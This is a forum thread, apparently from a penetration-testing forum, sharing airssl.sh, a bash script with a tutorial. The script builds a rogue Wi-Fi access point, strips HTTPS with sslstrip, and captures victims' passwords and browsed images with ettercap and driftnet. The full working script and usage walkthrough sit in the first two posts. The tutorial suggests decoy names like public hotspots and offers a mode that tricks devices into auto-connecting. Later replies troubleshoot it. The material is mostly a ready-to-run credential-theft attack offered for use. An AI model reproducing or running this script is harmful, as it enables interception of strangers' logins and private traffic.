Page 1 of 4 123 ... LastLast
Results 1 to 10 of 88

Thread: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

Hybrid View

  1. #1
    Very good friend of the forum killadaninja's Avatar
    Join Date
    Oct 2007
    Location
    London, United Kingdom.
    Posts
    526

    Default NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    airssl.sh creates a fake access point using Airbase-ng and uses sslstrip to bypass ssl encryption, it also offers the user the choice to use Driftnet to capture images.

    airssl.sh gives the user the option, on the fly, to configure Airbase-ng and Ettercap, giving the user the possibility to load filters etc. This script also takes into consideration less literate users, offering them the chance to use basic modes for everything.

    Upon execution airssl.sh creates a working directory at /pentest/wireless/airssl, it then creates a dhcpd.conf file to use along with all the other necessary files it needs to work.

    Tutorial.
    Installation and use of airssl.sh is very simple and is covered below.

    Requirements.
    Airssl requires you to have at least 1 WNIC (wireless network interface card) for broadcasting the fake AP, and another WNIC/NIC to be connected to the internet. For the sake of this tutorial, eth1 will connected to the internet and I will use wlan0 to broadcast the fake AP. airssl.sh manually configures ipforwarding, so if you have removed the comments from etter.conf to enable this then please rehash them, i.e. a default etter.conf

    Installing airssl

    1. Right click on your desktop and choose create new, now choose "text file" and finally name it airssl.sh
    2. Copy the script in the next post.
    3. navigate back to your desktop right click on the airssl.sh file you created and then choose open with, then select Kate.
    4. Now hit "ctrl v" to paste the code you copied in the next post, then hit "ctrl s", to save the file and finally "ctrl q" to quit kate.
    5. Now open up a terminal and and write
    Code:
    chmod 755  /root/airssl.sh
    (If airssl.sh is not in /root/ you probably do not need to be reading this tutorial.)

    6. Now open up a terminal and write
    Code:
    /root/airssl.sh
    You should see
    Code:
    AIRSSL 2.0 - Credits killadaninja & G60Jon
    If you do, then Well done, the script has started.

    Using airssl
    The 1st question airssl will ask you is
    Code:
    Enter the networks gateway IP address, this should be listed above. For example 192.168.0.1:
    Above this question airssl has already grepd your gateway`s address and named your wireless device attached to it.

    Code:
    AIRSSL 2.0 - Credits killadaninja & G60Jon
    
    0.0.0.0         192.168.0.1     0.0.0.0         UG    0      0        0 eth1
    
    
    Enter the networks gateway IP address, this should be listed above. For example 192.168.0.1:
    This clearly shows that in this circumstance eth1 is the connected device to a gateway address of 192.168.0.1

    So I input 192.168.0.1 and hit enter, this bring airssl to its next question



    Code:
    Enter your interface that is connected to the internet, this should be listed above. For example eth1:
    No problem we know this from our information above and in this circumstance it happens to be eth1.

    so we input eth1 and hit enter, airssl asks us it`s next question.

    Code:
    Enter your interface to be used for the fake AP, for example wlan0:
    If you are unsure the name of the dev you want to use for broadcasting the rouge AP then open a new console, and input
    Code:
    airmon-ng
    For me this returns
    Code:
    Interface       Chipset         Driver
    
    eth1            Broadcom                wl
    wlan0           RTL8187         rtl8187 - [phy0]
    As airssl told us earlier, eth1 is the card connected to the gateway thus the card we want to use for the rouge AP, in this circumstance, must be wlan0.

    So we input wlan0 and hit enter, which brings airssl it`s next question

    Code:
    Enter the ESSID you would like your rogue AP to be called
    What airssl is asking you here is, what do you want your Fake AP to be called, some good ideas might be McDonalds Hotspot, LA X Terminal 1, etc etc. (Note, spaces are allowed)

    For this tutorial we will input Freewifi and hit enter
    Which bring airssl to it`s next question.

    Code:
     Airbase-ng will run in its most basic mode, would you like to
    configure any extra switches?
    
    Choose Y to see airbase-ng help and add switches.
    Choose N to run airbase-ng in basic mode with your choosen ESSID.
    Choose A to run airbase-ng in respond to all probes mode (in this mode your choosen ESSID is not used, but instead airbase-ng responds to all incoming probes), providing victims have auto connect feature on in their wireless settings (MOST DO), airbase-ng will imitate said saved networks and victim will connect to us, likely unknowingly. PLEASE USE THIS OPTION RESPONSIBLY.
    Y, N or A
    The above question is pretty self explanatory, if you want to learn more about the -a switch or any of the switches consult the airbase-ng faq

    For the sake of this tutorial we will choose n, so we input n and continue.

    airssl will print a few lines and open a few xterm windows, (so we can see what is happening with the attack), after a few seconds AIRSSL will ask it`s next question.
    Code:
    Ettercap will run in its most basic mode, would you like to
    configure any extra switches for example to load plugins or filters,
    (advanced users only), if you are unsure choose N
    Y or N
    Again in this tutorial we will choose N, loading Ettercap filters is beyond the depth of this tutorial, consult the Ettercap FAQ to learn more.

    After we input N and hit enter, we should see the next question.

    Code:
    Would you also like to start driftnet to capture the victims images,
    (this may make the network a little slower)
    Y or N
    Again for this tutorial we will choose n however, even the less advanced users may choose y here, nothing complicated will happen we will just see the victims images as they browse these are also saved at /pentest/wireless/airssl/driftftnetdata. What ever you choose the final screen you will see will look like this.
    Code:
    [+] Activated...
    Airssl is now running, after victim connects and surfs their credentials will be displayed in ettercap. You may use right/left mouse buttons to scroll up/down ettercaps xterm shell, ettercap will also save its output to /pentest/wireless/airssl/passwords unless you stated otherwise. Driftnet images will be saved to /pentest/wireless/airssl/driftftnetdata
    
    [+] IMPORTANT...
    After you have finished please close airssl and clean up properly by hitting Y,
    if airssl is not closed properly ERRORS WILL OCCUR
    If all went well the attack is now running, using a test computer you should be able to scan for networks and connect to your newly created FakeAP, whilst on the test pc connect to a site you know uses SSL encryption and sign in, you should see credentials displayed in ettercaps xterm shell in plain text. This attack will also filter passwords from unencrypted sites, try one. Passwords saved from Ettercap . Dont forget you can use your right mouse button to scroll up ettercap, (incase you think you missed some credientals).

    Final Note
    As you can see you are still left with one last question, AIRSSL asks you to type Y to clean up properly, after you have finished your session I strongly suggest you take notice of this and do has asked. If you do not choose Y and let airssl close properly your system may become disfunctional. Another serious note if airssl is not working, try getting to this step and choosing Y (to clean up), now try running airssl again, this can help run airssl because it may fix some forwarding or other dev creation errors.
    Last edited by killadaninja; 11-19-2010 at 09:00 AM.

  2. #2
    Very good friend of the forum killadaninja's Avatar
    Join Date
    Oct 2007
    Location
    London, United Kingdom.
    Posts
    526

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    Code:
    #!/bin/bash
    # (C)opyright 2009 - killadaninja - Modified G60Jon 2010
    # airssl.sh - v1.0
    # visit the man page NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh
    
    # Network questions
    echo
    echo "AIRSSL 2.0 - Credits killadaninja & G60Jon  "
    echo
    route -n -A inet | grep UG
    echo
    echo
    echo "Enter the networks gateway IP address, this should be listed above. For example 192.168.0.1: "
    read -e gatewayip
    echo -n "Enter your interface that is connected to the internet, this should be listed above. For example eth1: "
    read -e internet_interface
    echo -n "Enter your interface to be used for the fake AP, for example wlan0: "
    read -e fakeap_interface
    echo -n "Enter the ESSID you would like your rogue AP to be called: "
    read -e ESSID
    airmon-ng start $fakeap_interface
    fakeap=$fakeap_interface
    fakeap_interface="mon0"
    
    # Dhcpd creation
    mkdir -p "/pentest/wireless/airssl"
    echo "authoritative;
    
    default-lease-time 600;
    max-lease-time 7200;
    
    subnet 10.0.0.0 netmask 255.255.255.0 {
    option routers 10.0.0.1;
    option subnet-mask 255.255.255.0;
    
    option domain-name "\"$ESSID\"";
    option domain-name-servers 10.0.0.1;
    
    range 10.0.0.20 10.0.0.50;
    
    }" > /pentest/wireless/airssl/dhcpd.conf
    
    # Fake ap setup
    echo "[+] Configuring FakeAP...."
    echo
    echo "Airbase-ng will run in its most basic mode, would you like to
    configure any extra switches? "
    echo
    echo "Choose Y to see airbase-ng help and add switches. "
    echo "Choose N to run airbase-ng in basic mode with your choosen ESSID. "
    echo "Choose A to run airbase-ng in respond to all probes mode (in this mode your choosen ESSID is not used, but instead airbase-ng responds to all incoming probes), providing victims have auto connect feature on in their wireless settings (MOST DO), airbase-ng will imitate said saved networks and victim will connect to us, likely unknowingly. PLEASE USE THIS OPTION RESPONSIBLY. "
    echo "Y, N or A "
     
    
    read ANSWER
    
    if [ $ANSWER = "y" ] ; then
    airbase-ng --help
    fi
    
    if [ $ANSWER = "y" ] ; then
    echo
    echo -n "Enter switches, note you have already chosen an ESSID -e this cannot be 
    redefined, also in this mode you MUST define a channel "
    read -e aswitch
    echo
    echo "[+] Starting FakeAP..."
    xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng "$aswitch" -e "$ESSID" $fakeap_interface & fakeapid=$!
    sleep 2
    fi
    
    if [ $ANSWER = "a" ] ; then
    echo
    echo "[+] Starting FakeAP..."
    xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -P -C 30 $fakeap_interface & fakeapid=$!
    sleep 2
    fi
    
    
    if [ $ANSWER = "n" ] ; then
    echo
    echo "[+] Starting FakeAP..."
    xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -e "$ESSID" $fakeap_interface & fakeapid=$!
    sleep 2
    fi
    
    # Tables
    echo "[+] Configuring forwarding tables..."
    ifconfig lo up
    ifconfig at0 up &
    sleep 1
    ifconfig at0 10.0.0.1 netmask 255.255.255.0
    ifconfig at0 mtu 1400
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
    iptables -P FORWARD ACCEPT
    iptables --append FORWARD --in-interface at0 -j ACCEPT
    iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    
    # DHCP
    echo "[+] Setting up DHCP..."
    touch /var/run/dhcpd.pid
    chown dhcpd:dhcpd /var/run/dhcpd.pid
    xterm -geometry 75x20+1+100 -T DHCP -e dhcpd3 -d -f -cf "/pentest/wireless/airssl/dhcpd.conf" at0 & dchpid=$!
    sleep 3
    
    # Sslstrip
    echo "[+] Starting sslstrip..."
    xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -p -k 10000 & sslstripid=$!
    sleep 2
    
    # Ettercap
    echo "[+] Configuring ettercap..."
    echo
    echo "Ettercap will run in its most basic mode, would you like to
    configure any extra switches for example to load plugins or filters,
    (advanced users only), if you are unsure choose N "
    echo "Y or N "
    read ETTER
    if [ $ETTER = "y" ] ; then
    ettercap --help
    fi
    
    if [ $ETTER = "y" ] ; then
    echo -n "Interface type is set you CANNOT use "\"interface type\"" switches here
    For the sake of airssl, ettercap WILL USE -u and -p so you are advised
    NOT to use -M, also -i is already set and CANNOT be redifined here. 
    Ettercaps output will be saved to /pentest/wireless/airssl/passwords
    DO NOT use the -w switch, also if you enter no switches here ettercap will fail "
    echo
    read "eswitch"
    echo "[+] Starting ettercap..."
    xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u "$eswitch" -T -q -i at0 & ettercapid=$!
    sleep 1
    fi
    
    if [ $ETTER = "n" ] ; then
    echo
    echo "[+] Starting ettercap..."
    xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u -T -q -w /pentest/wireless/airssl/passwords -i at0 & ettercapid=$!
    sleep 1
    fi
    
    # Driftnet
    echo
    echo "[+] Driftnet?"
    echo
    echo "Would you also like to start driftnet to capture the victims images,
    (this may make the network a little slower), "
    echo "Y or N "
    read DRIFT
    
    if [ $DRIFT = "y" ] ; then
    mkdir -p "/pentest/wireless/airssl/driftnetdata"
    echo "[+] Starting driftnet..."
    driftnet -i $internet_interface -p -d /pentest/wireless/airssl/driftnetdata & dritnetid=$!
    sleep 3
    fi
    
    xterm -geometry 75x15+1+600 -T SSLStrip-Log -e tail -f sslstrip.log & sslstriplogid=$!
    
    clear
    echo
    echo "[+] Activated..."
    echo "Airssl is now running, after victim connects and surfs their credentials will be displayed in ettercap. You may use right/left mouse buttons to scroll up/down ettercaps xterm shell, ettercap will also save its output to /pentest/wireless/airssl/passwords unless you stated otherwise. Driftnet images will be saved to /pentest/wireless/airssl/driftftnetdata "
    echo
    echo "[+] IMPORTANT..."
    echo "After you have finished please close airssl and clean up properly by hitting Y,
    if airssl is not closed properly ERRORS WILL OCCUR "
    read WISH
    
    # Clean up
    if [ $WISH = "y" ] ; then
    echo
    echo "[+] Cleaning up airssl and resetting iptables..."
    
    kill ${fakeapid}
    kill ${dchpid}
    kill ${sslstripid}
    kill ${ettercapid}
    kill ${dritnetid}
    kill ${sslstriplogid}
    
    airmon-ng stop $fakeap_interface
    airmon-ng stop $fakeap
    echo "0" > /proc/sys/net/ipv4/ip_forward
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    
    echo "[+] Clean up successful..."
    echo "[+] Thank you for using airssl, Good Bye..."
    exit
    
    fi
    exit
    Last edited by killadaninja; 11-19-2010 at 09:06 AM.

  3. #3
    Just burned his ISO
    Join Date
    May 2010
    Posts
    5

    Default

    great post, thank you for sharing =)

    P.S : is it possible to make ettercap output a better result table? for example i capture my own yahoo login, but the log files are saved in coded format. =/
    Last edited by kenv202; 05-10-2010 at 06:37 PM.

  4. #4
    Very good friend of the forum killadaninja's Avatar
    Join Date
    Oct 2007
    Location
    London, United Kingdom.
    Posts
    526

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    You would need to use Wireshark or something of the like to open them, perhaps I will make a good filter for Wireshark to filter credentials.
    Sometimes I try to fit a 16-character string into an 8–byte space, on purpose.

  5. #5
    Just burned his ISO
    Join Date
    May 2010
    Posts
    6

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    I am running this script using eth0 as my internet-facing NIC (hardwired to my router but obtaining an IP using DHCP) and wlan0 as the FakeAP NIC. I can see the SSID from another computer but when I try to connect to it, it does not obtain an IP Address. I can see the DHCPDISCOVER come in and the subsequent DHCPOFFER of 10.0.0.20 but the client never accepts this address. The request will time out and I will see another DHCPDISCOVER and DHCPOFFER. Perhaps you can offer some insight as to why this is happening. Is it conflicting with the DHCP used between eth0 and my home router?

    I ran Wireshark on both machines. Both machines see the DHCPDISCOVER but only the the server machine sees the DHCPOFFER.
    Last edited by eeveeayen; 05-15-2010 at 03:02 AM.

  6. #6
    Just burned his ISO 409an5's Avatar
    Join Date
    May 2010
    Posts
    1

    Thumbs up Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    Nice Info. Thanks. I am going to try this out.

  7. #7
    Junior Member
    Join Date
    Apr 2010
    Posts
    30

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    Quote Originally Posted by killadaninja View Post
    You would need to use Wireshark or something of the like to open them, perhaps I will make a good filter for Wireshark to filter credentials.
    Thank you, will look forward to this..

  8. #8
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    13

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    Hi, nice script, however i had to add two lines to get it to work for me (red text is the new line)

    read -e internet_interface
    echo -n "Enter your interface to be used for the fake AP, for example wlan1: "
    read -e fakeap_interface
    echo -n "Enter the ESSID you would like your rogue AP to be called, for example Free WiFi: "
    read -e ESSID


    airmon-ng start $fakeap_interface
    fakeap_interface="mon0"


    might help someone else having trubble with it

  9. #9
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    1

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    subscribing.

    great info thanks

  10. #10
    Senior Member MikeCa's Avatar
    Join Date
    Jan 2010
    Location
    DC
    Posts
    129

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    I did a fair bit of experimenting with this script today and here are my experiences.

    If you are running module rtl8187 then you need to add the bit where you start airmon-ng and change fakeap_interface to mon0. This is because when wlan0 (the wifi device that creates the fake ap) goes into monitor mode it creates a new device called mon0. If you are running r8187 then this device is not created: wlan0 goes into monitor mode, no new devices are created.

    There is some outstanding issue with blank network names being created. On a macbook with a wifi dongle the network appeared with no name, but I was able to connect, get an IP address and everything worked. With my iPhone I can actually see the network named properly but I can not get an IP address. On a Windows XP machine the name is corrupted, usually it never shows up but sometimes the name appears as a series of boxes. If this happens then I can connect and get an IP address. So there appears to be an issue with creating the fake AP. I wonder if it is related to the -y switch in airbase-ng. There seems to be some discussion around the Internet about this, I could not get it to make a difference though with a lot of experimenting.

    I am using the r8187 module, a alfa for the fake AP, and using eth0 for the Internet connection.

Page 1 of 4 123 ... LastLast

Similar Threads

  1. Replies: 44
    Last Post: 04-08-2011, 02:30 AM
  2. Replies: 6
    Last Post: 10-08-2010, 11:40 PM
  3. sslstrip with ettercap or airspoof not capturing password
    By danielgc in forum OLD BackTrack 4 General Support
    Replies: 3
    Last Post: 08-29-2009, 10:29 PM
  4. Capturing passwords on a big LAN!
    By dxi5t in forum OLD Pentesting
    Replies: 5
    Last Post: 06-10-2008, 05:05 PM
  5. Wifiopn-cap: automated OPN Network capturing script
    By teknecal in forum OLD Tutorials and Guides
    Replies: 2
    Last Post: 04-21-2008, 01:39 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •